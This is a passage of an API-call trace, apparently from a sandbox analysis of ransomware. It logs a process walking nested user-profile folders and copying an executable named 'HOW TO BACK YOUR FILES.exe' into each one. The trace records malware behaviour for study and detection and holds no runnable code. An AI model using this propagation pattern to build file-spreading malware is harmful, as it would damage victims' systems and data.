(hObject=0x154) returned 1 [0065.901] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.901] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58881e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58881e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.902] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.902] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.902] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0065.902] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0065.902] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.902] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.902] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.903] GetLastError () returned 0x0 [0065.903] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.903] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.903] CloseHandle (hObject=0x154) returned 1 [0065.903] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.903] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58940500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58940500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.903] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.903] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.903] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0065.903] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0065.903] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.903] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.904] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.904] GetLastError () returned 0x0 [0065.904] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.904] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.904] CloseHandle (hObject=0x154) returned 1 [0065.904] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.904] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.905] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.905] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.905] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0065.905] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0065.905] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.905] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.905] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.905] GetLastError () returned 0x0 [0065.906] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.906] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.906] CloseHandle (hObject=0x154) returned 1 [0065.906] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.906] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x58966660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58966660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.906] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.906] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.906] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0065.906] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0065.906] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.906] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.907] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.907] GetLastError () returned 0x0 [0065.907] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.907] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.907] CloseHandle (hObject=0x154) returned 1 [0065.907] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.907] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.908] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.908] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.908] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0065.908] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0065.908] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.908] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.908] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.908] GetLastError () returned 0x0 [0065.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.909] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.909] CloseHandle (hObject=0x154) returned 1 [0065.909] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.909] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x589d8a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x589d8a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.909] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.909] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.909] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0065.909] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0065.909] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.909] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.910] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.910] GetLastError () returned 0x0 [0065.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.910] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.916] CloseHandle (hObject=0x154) returned 1 [0065.916] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.916] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.920] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.920] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.920] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0065.920] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0065.920] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.920] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.923] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.923] GetLastError () returned 0x0 [0065.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.923] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.923] CloseHandle (hObject=0x154) returned 1 [0065.923] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.923] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x555c6940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.923] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.923] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.924] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0065.924] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0065.924] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.924] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.924] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.924] GetLastError () returned 0x0 [0065.924] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.925] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.925] CloseHandle (hObject=0x154) returned 1 [0065.925] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.927] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.927] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.927] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.927] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0065.928] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0065.928] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.928] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.929] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR 